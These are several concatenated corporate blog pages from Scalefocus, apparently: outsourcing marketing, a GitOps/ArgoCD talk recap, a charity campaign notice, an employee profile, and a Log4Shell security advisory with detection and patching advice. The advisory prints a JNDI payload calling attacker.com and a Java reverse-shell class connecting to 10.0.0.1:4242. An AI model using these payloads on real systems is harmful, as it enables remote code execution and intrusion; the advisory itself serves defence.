should always be alert to potential security issues, but remote access to sensitive data can easily be restricted so that it is not compromised. 5. Speed to Market Higher speed to market is another factor in favor of outsourcing business overseas. It is not uncommon to have your new product delivered well before agreed deadlines, which gives you the chance to have the upper hand over competitors when it comes to simultaneous releases of new functionalities or updates. Acceleration means more time for new services and products, hence an expanded portfolio. And with more time to spare, your own company’s productivity will increase, and your internal business processes will improve drastically. 6. Flexibility Flexibility is also crucial, and a remote software development center gives you the luxury to cherry-pick the ultimate business model based on your priorities and strategies and fine-tune it in accordance with budget and schedule. What’s more, IT providers would always let you check the quality of their products by examining test versions before deciding whether to invest in a particular project. 7. Technology Modern technology is never reasonably priced, and with remote development centers, you get access to the latest tools and processes as part of the package. This means it is more likely to acquire state-of-the-art products delivered by top developers at a more minimal cost than if you build an in-house software development unit. 8. Extended Business Coverage Round-the-clock customer support is difficult to maintain, and after-hours labor is another expense you could do without. However, the modern age of non-stop access to products and services has established new customer service standards that make 24/7 coverage a must. IT outsourcing seems to be the logical solution here, as companies utilize different time zones to effectively cover the night shifts at their native locations by hiring overseas. 9. Tax Benefits Numerous countries grant tax benefits and financial incentives to foreign enterprises in order to attract investments. The purpose of such government policies is to improve employment rates and promote sustained economic growth in the country. They also help investors gain substantial profit, not to mention that incentives and tax exemptions make the relocation much more straightforward. 10. Location These are some of the reasons Eastern European countries have been among the most popular destinations for offshore outsourcing in the past decades. And there are a few others beyond the obvious gap in the standard of living. Time zone-wise, it is an ideal longitude to cover night shifts in the US. At the same time, geographical proximity and cultural resemblances make the region very suitable for onshore and nearshore outsourcing by German and UK companies. Language proficiency has also improved significantly, while the local IT specialists’ reputation has been impeccable for quite a while. Key Takeaways In conclusion – the pandemic situation has affected all aspects of life and business, and the IT industry is no exception. Remote work makes people spend additional time online and use more technology than ever, which has forced enterprises to increase their investment in software development. Reduced cost, agility, scalability, modern tools and processes, and improved time to market – these are some of the competitive advantages that have led numerous companies to start collaborations with remote software development centers. Scalefocus is a prime example of an offshore provider of digital solutions that can spare their partners the time and resources for in-house software development. And without that distraction from their core competencies, they will have the energy to perfect their main products and services. Regardless of whether they are small start-ups or massive corporations, this is what really matters at the end of the day. Contact Scalefocus and discover more.

Table of contents Offshore vs. Nearshore vs. Onshore Development Offshore Development: Five Key Opportunities Onshore, Nearshore, Hybrid Outsourcing Conclusion Key Takeaways: Offshore development centers offer attractive incentives for US-based businesses IT outsourcing services have been growing in popularity in areas like Bulgaria Offshore vs. Nearshore vs. Onshore Development An increasing number of businesses is shifting focus to nearshore or foreign countries in efforts to better handle business operations and maintain a competitive edge. All of these companies look for favorable areas where they can host a large amount of their data or software development operations. As remote work becomes the new normal, consumer expectations are relentlessly on the rise. With the constant IT talent scarcity likely here to stay, more and more enterprises invest in offshore or onshore software development solutions. Before we get into specifics, it’s important to mention there are several types of remote software development. Alongside offshore, there is onshore, nearshore and even hybrid IT outsourcing. We’ll get to them in a moment. First, let’s take a look at offshore software development and five key opportunities it offers. For a start, when companies go to offshore destinations, they’re mainly looking to find advantages that are usually lacking on their own soil. That means, for example, a US business might choose to go for offshore development in a country in Eastern Europe. The step could be prompted by a desire to cut costs without reducing quality. Offshore Development: Five Key Opportunities 1. Ability to Scale Up or Down The first advantage you want to consider when you look for an offshore development center is scalability. A large and reputable offshore partner will have a strong arsenal of resources and workforce. On that front, you won’t have to bother with training or managing domestic teams to handle operations that are expected to scale to difficult-to-maintain levels. Instead, you could easily turn to your offshore partner for this matter. IT development services, for instance, are projected to scale quicker relative to other industries. 2. Access to a Rich Talent Pool Once you are certain that partnering with an offshore development center will allow you to optimize cost, you must make sure you got the right people for the job. That means you have to tap into the talent pool and find skilled professionals. Ideally, you would want to end up with a partner who is able to offer high-level experience in your industry. Additionally, your offshore development center should be an expert in the specific technology that your business might need. 3. Extended Business Coverage Long-term maintenance of your business is crucial for staying ahead of the curve. Not only that, but you have to make sure there will be no issues, or hiccups, from customer service to up-to-date software. On this note, the arrival of the Internet has allowed companies to outsource their customer support to offshore areas. Before you take the step, you have to consider a few important factors. First, the time zone. While some consider it a disadvantage, others think a time zone vastly different than the domestic one is a plus. 4. Hassle-Free Regulatory Compliance Offshore zones are likely to offer a better regulatory climate, especially for the IT industry. This said, IT outsourcing partners will make it easier for you in terms of tax compliance and regulatory pressures. 5. Cost Optimizations Cost optimizations are a leading reason for US-based businesses to look abroad for offshore development centers. With this in mind, it’s fairly easy for a company to find not only reasonable but very favorable rates in offshore areas. Some countries that offer significantly lower rates than, say, the United States, include Bulgaria, Ukraine, or India. In that context, developing economies present the competitive advantage of lower labor costs relative to developed economies. Further, a business using an offshore partner could cut additional costs like technology resources such as hardware or software. Also, the outsourcing company is likely to offer its own infrastructure. Moreover, you can avoid expenses like healthcare insurance, social security taxes or other in-house costs. All of this should be taken care of by your offshore strategic partner, responsible to cater for its own staff. In turn, your company would enjoy more profits, allowing it to expand further. Onshore, Nearshore, Hybrid Outsourcing With the above, we covered five key opportunities for businesses that look to outsource services to offshore centers. Now, let’s see how other outsource locations and centers stack against it. 1. Onshore Development Second, onshore outsourcing (also called domestic), suggests the development center would be located in the same country. In turn, this would mean the two parties will most likely have the same culture in relation to work. That could result in a closer contact and a better business-to-client relationship. On the flip side, however, it’s worth mentioning that there are a number of disadvantages. First, the onshore partner would share the same cost of living, which would not lead to cost optimization. And second, the two parties will share the same time zone, which could make it difficult for you to have extended business coverage. 2. Nearshore Development Also, nearshore outsourcing would most likely be coming with a lower price tag than hosting your services in-land. 3. Hybrid Outsourcing While a fairly complex way to do business operations, a hybrid model combines offshore outsourcing with onshore management. In other words, the hybrid outsourcing model allows you to retain your management locally while you outsource operations related to technology, infrastructure or customer support. This model could present some challenges for you as it will most likely be fairly difficult to organize an efficient, well-optimized structure. As the management is away from on-site operations, it would be virtually impossible for them to be in control of day-to-day activities and spot potential issues. In turn, this could lead to deficiencies and disruptions in the work model and overall business processes. Conclusion Offshore outsourcing offers five key opportunities for businesses. In a nutshell, these are lower costs, talent pool, maintenance, regulations, and scalability. Each of these benefits holds attractive incentives for companies looking to offload some of the operational weight. As a result, they will be able to better focus on their core business operations. Besides offshore outsourcing, there is also onshore, which suggests services remain within the same country. In addition to these, nearshore development centers offer the benefit of staying near but still outside of your own land. And finally, there is the hybrid model which offers a combination of an offshore center and a local management team. To this end, Scalefocus is readily available to offer you a rich variety of software development solutions. A preferred offshore development center, Scalefocus is well-positioned in the industry and boasts a robust reputation as a leader in the sector. Contact us and we will be happy to discuss how we can help you accelerate your software development in the ever-changing and highly-competitive business world.

The second edition of the Scalefocus series Tech Savvy Talks was held on 20 October. If you are new here - Tech Savvy Talks are online events organised bi-weekly, covering various technology topics. The initiative's primary goal is to gather colleges and people with similar interests to discuss new tech trends, best practices and share knowledge and insights from their expertise. Another plus of the activity is that it's free and open to anyone. Follow Scalefocus's profile  and be the first to know about the upcoming topics and events. Now let's explore the second episode dedicated to GitOps on AWS: Simplify Kubernetes Deployments. Petar Gjorgievski was the presenter, he is a DevOps Engineer at Scalefocus based in Skopje. During his talk, he covert topics as: What is GitOps GitOps principles GItOpsbenefits How a GitOps pipeline might look like Explore the ArgoCD tool Short demo where we are going to try to configure and set up a working GitOps pipeline What exactly is GitOps GitOps is a way to do Kubernetes cluster management and application delivery. GitOps works by using Git as a single source of truth for declarative infrastructure and applications. With GitOps, the use of software agents can alert on any divergence between Git with what's running in a cluster, and check if there's a difference, Kubernetes reconcilers automatically update or rollback the cluster depending on the case. With Git at the center of your delivery pipelines, developers can use familiar tools to make pull requests to accelerate and simplify both application deployments and operations tasks to Kubernetes. Let’s talk about GitOps principles The entire system described declaratively With your application’s declarations versioned in Git, you have a single source of truth. Your apps can then be easily deployed and rolled back to and from Kubernetes. And even more importantly, when disaster strikes, your cluster’s infrastructure can also be dependably and quickly reproduced. The canonical desired system state versioned in Git With the declaration of your system stored in a version control system, and serving as your source of truth, you have a single place from which everything is derived and driven. This trivializes rollbacks which can be achieved with a simpler git revert. Using Git, you get the extra benefit to have a look into the authors of the code. Approved changes that can be automatically applied to the system This means that every time a pull request is approved and merged, you are able to sync up your cluster automatically and make a deployment without the necessity to give direct access to the cluster. Software agents to ensure correctness and alert on divergence This means that there is essentially an agent which always monitors both the current state of the cluster and the source of truth and alerts on any changes on either side of the configuration. This leads us to the Benefits of GitOps 1. Simply said, it increases productivity. Continuous deployment automation with an integrated feedback loop speeds up the time to deployment. 2. Enhanced Developer Experience Developers just have to push code to git and not worry about building containers or knowing the internal workings and configurations of the kubernetes cluster. This also makes it easier to onboard new colleagues and get them to start contributing faster. 3. Improved Stability & Higher Reliability Using Git to have more stable, reliable and reproducible rollbacks, as we mentioned previously, Git is also the only source of truth that it's the alpha and omega. It can help recover from disasters relatively quickly. 4. Consistency and Standardization Finally, Gitops offers us consistency, meaning, everything we have, our whole workflow including the application code and infrastructure code is built on top of our git repositories. Git Workflow 1. Leverages git workflow 2. Git as source of truth 3. Manage multiple environments 4. Easy rollbacks ArgoCD ArgoCD is a GitOps tool that helps with your GitOps workflows. ArgoCD can be used as a standalone tool or part of your CI/CD workflow. low. ArgoCD works with Git as a source of truth, with current Kubernetes manifests, or with Helm charts. It can be managed both declaratively through a click or a Dashboard which is quite nice, to be honest. It can be deployed inside of your cluster or outside of it and it works as General commanding its army with the way that it operates in the whole GitOps workflow. For more – watch the demo. There are alternatives like for example Flux, Jenkins X, and a few others as well. But we are sticking with ArgoCD. ArgoCD Positives 1. Container native workflow 2. Event based dependency manager for K8s 3. Declarative continuous delivery for K8s 4. Dashboard With all that cleared out, we can proceed with the DEMO. You can watch it here and the whole Tech Savvy talk where Petar Gjorgievski shared a lot more details and knowledge on the mentioned topics and many more, for example - а model of a GitOps Pipeline and a Setup. Got your interest? To see the talks and check what’s next, don’t forget to sign up for the following events: Scalefocus Events | Eventbrite Oh last but not least, it’s not all, so work-oriented, we have some gifts for you. Attend the next Tech Savvy Talk and get yours. See you there.

Yordan Popov, Security Engineer On the 9th of December 2021 a zero-day exploit, affecting the popular Аpache Log4j utility was made public CVE-2021-44228. This vulnerability is actively being exploited and anyone using Log4j should take immediate actions to remediate this critical to security component. In this article we will go over the vulnerability and it’s remediations. TL;DR CVE-2021-44228 impacts Apache Log4J Java library Easy to exploit, high impact, achieves RCE (Remote code execution) with system-level permissions Patch Log4J to version >=2.15.0 What is Log4j? Java-based library used for logging in big percentage of the Java applications. According to Maven Central Repository Log4j is used in 16,601 open-source projects Some of the confirmed vulnerable organisations / components are: Apple Minecraft Steam Twitter Elasticsearch And many others. For additional information on the confirmed vulnerable services. Vulnerability The following payload would exploit this vulnerability: ${jndi:ldap://attacker.com/a} Using the JNDI interface, log4j will download a .class file and deserializes it in unsafe manner. Utilizing the built-in feature of Java - static initializer (code in a static initializer block is executed by the virtual machine when the class is loaded.) a RCE can be achieved. Of course there are other ways to achieve code execution, that’s why patching is very important. If the JVM property com.sun.jndi.ldap.object.trustURLCodebase is set to true, other possibility would be utilizing LDAP ObjectFactory. LDAP ObjectFactory lets the LDAP response tell where to get the bytecode of another ObjectFactory. public class ReverseShell implements ObjectFactory { @Override public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { Runtime r = Runtime.getRuntime(); p = r.exec(getShellPayload()); p.waitFor(); return null; } public String getShellPayload(){ return new StringBuilder() .append("/bin/bash -c \'") .append("exec 5<>/dev/tcp/10.0.0.1/4242;") .append("cat <&5 | ") .append("while read line; ") .append("do $line 2>&5 >&5; ") .append("done\'") .toString(); } } According to LunaSec JDK version greater than 6u211, 7u201, 8u191, and 11.0.1 do not seem to be affected by the above LDAP attack, since com.sun.jndi.ldap.object.trustURLCodebase is set to false , however the other method is working. Impact Logging untrusted user input, can result in Remote Code Execution if a vulnerable version of Log4j is used. The impact is critical, since it’s relatively easy to exploit (just a single line which is logged!) and it achieves system-level privileges. As a result CVE-2021-44228 is rated perfect 10/10 CVSS Score How to test There are multiple ways to detect if you are vulnerable. Check logs - someone might have exploited it already! Use open source tool like LogShell-Detector Utilize Huntress Online Tool Trigger DNS query either by using your own authoritative DNS server or the following open source web app CanarayTokens.org Go to https://canarytokens.org/generate# Generate DNS Token (something like hq61hp3upawijfa7zqqdcdm60.canarytokens.com), put your email address. Craft the following payload: ${jndi:ldap:///a} something like: ${jndi:ldap://hq61hp3upawijfa7zqqdcdm60.canarytokens.com/a} Place it everywhere where user input is provided and might be logged (search forms, profile data, HTTP Headers, … etc) If an email is received that a DNS lookup is performed then you are vulnerable! Remediation Best way to mitigate that is by patching to a version >=2.15.0 However keep in mind that you will not be able to patch the vulnerability if a vulnerable version of Log4j is used in a dependency which you are importing, for this reason set log4j2.formatMsgNoLookups to true (Log4J >=2.10) and monitor the logs, also add YARA rules if possible. Another mitigation is completely removing the JndiLookup class from the classpath, but that my affect the usability of the application. CyberSec Risk Manager - CsRM With our platform CsRM we were able to detect the Log4j vulnerability within less than 16h hours of it being publicly available, allowing our customers to take immediate actions to their affected services. The CsRM platform monitors your vulnerabilities, risk & compliance in all Open Source Code Components, Infrastructure and Cloud, empowering you to take accurate and informed decisions for your business at any time. For more information check out - CsRM References https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b https://www.blumira.com/cve-2021-44228-log4shell/ https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/ https://www.cloudsavvyit.com/15042/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet/ https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

The software company Scalefocus provides over 80 prophylactic medical checks in Acibadem City Clinic Tokuda Hospital through the initiative IT Beards The third edition of the IT Beards initiative of Scalefocus provides over 80 free prophylactic medical checks for early diagnostics of prostate cancer in men at risk ages. The charity campaign, part of Movember, was conducted throughout the month of November. Scalefocus created a special platform for the cause on which employees of the company published photos of their beards and moustaches, generating votes for their special vision. The generated funds will be donated to Acibadem City Clinic Tokuda Hospital to conduct medical screening at the Clinic of Urology, led by Prof. Kaloyan Davidov. The checks will take place in December. Registrations could be made at phone: 02/403 4000. The goal of the initiative is to provide timely access to specialized health assistance, as the prevention and early diagnostics of this malicious disease is of utmost importance for the course of its treatment. The prostate cancer can be cured if diagnosed on time. The disease has no symptoms, and if any appear, this usually happens at a late stage. The free medical checks are recommended for men over 50 years, or, in case of family history of the disease, over 45 years of age. The gathered funds from the IT Beards campaign will be realized in partnership with Acibadem City Clinic Tokuda Hospital and the CancerCare.bg foundation. ‘Health is a matter of responsibility to yourself and to your family, to people whom you love and who love you. If we face a challenging situation, we should first try to accept it and then soundly assess what could be of help, instead of fighting against it, so that we can continue living a good life, as much as possible.’ MD Margarita Tarejn, clinical psychologist and a member of the multidisciplinary team at the University Hospital Tokuda, participating at the campaign devoted on men’s health.

On his background Location: Born in Rouse, currently living in Plovdiv. In between parts of my life were different cities and countries around the World. Status: Married... with Children. A daughter and a son. It sounds like a sitcom, but is not :) Education: I graduated from Computer Systems and Technologies at the University of Rouse. At that time, my desktop had a "Turbo" button. That means, long time ago. On his role at Scalefocus I started my carrier in Scalefocus more than three years ago, and I have changed a few positions since then. The current one is DevOps Technology Team Lead. As well, I am part of a project where I can practice my technical skills. Why Scalefocus? Because I have known the company and its people from the very beginning, I saw an excellent opportunity to develop myself and my career in an outstanding direction. On his team Our team is exciting because we are DevOps specialists with different seniorities, ages, and backgrounds, allowing us to transfer our knowledge to various aspects. On dealing with doubt I am trying to go deeper into the reason and find the best resolution. On music, hobbies, family, pets, and everything in between A lot of hobbies. Every free minute is spent on my hobbies. Some of them I am sharing with my family, the others with friends :) On the best advice for new software specialists If you are concentrated and motivated, the goals will be reached easily. On his everyday work life My work life is separated into two. The prime job is to be a parent. That means waking up at 6:00, preparing breakfast, waking up the kids, preparing them for school, bringing them to school and at the end, going to work (at the office or home, depending on the situation). That is precisely half working day. At the office/home usually, I start with checking my Calendar about meetings. This is helping me organize my tasks for the day related to my position as TTL and my current project on which I am working. Once the day at the office/home has finished, I am going back to my first job, which takes the other half of my first job working day, and so the entire day ends :)